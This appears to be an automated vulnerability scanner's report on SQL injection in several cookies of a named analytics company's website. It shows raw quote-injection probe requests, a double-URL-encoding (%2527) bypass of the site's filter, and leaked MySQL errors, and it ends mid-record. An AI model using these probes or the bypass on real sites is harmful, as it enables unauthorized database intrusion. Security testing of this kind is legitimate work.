GET /products/63-urchin/70-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html?start=4 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:50:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:50:51 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:50:51 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin/70-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html?start=4 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:46:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/70-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html?start=4 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:46:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:46:57 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:46:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin/70-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:47:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/70-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:47:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:47:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:47:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25241
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/63-urchin/85-urchin-hosted.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:41:54 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/85-urchin-hosted.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:41:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/63-urchin/85-urchin-hosted.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/85-urchin-hosted.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:05 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:51:09 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:51:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin/85-urchin-hosted.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:52:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/85-urchin-hosted.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:52:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:52:05 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:52:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/64-data-warehouse/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:04:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/64-data-warehouse/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:04:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/65-ae/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:41:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/65-ae/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:41:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:41:23 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:41:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
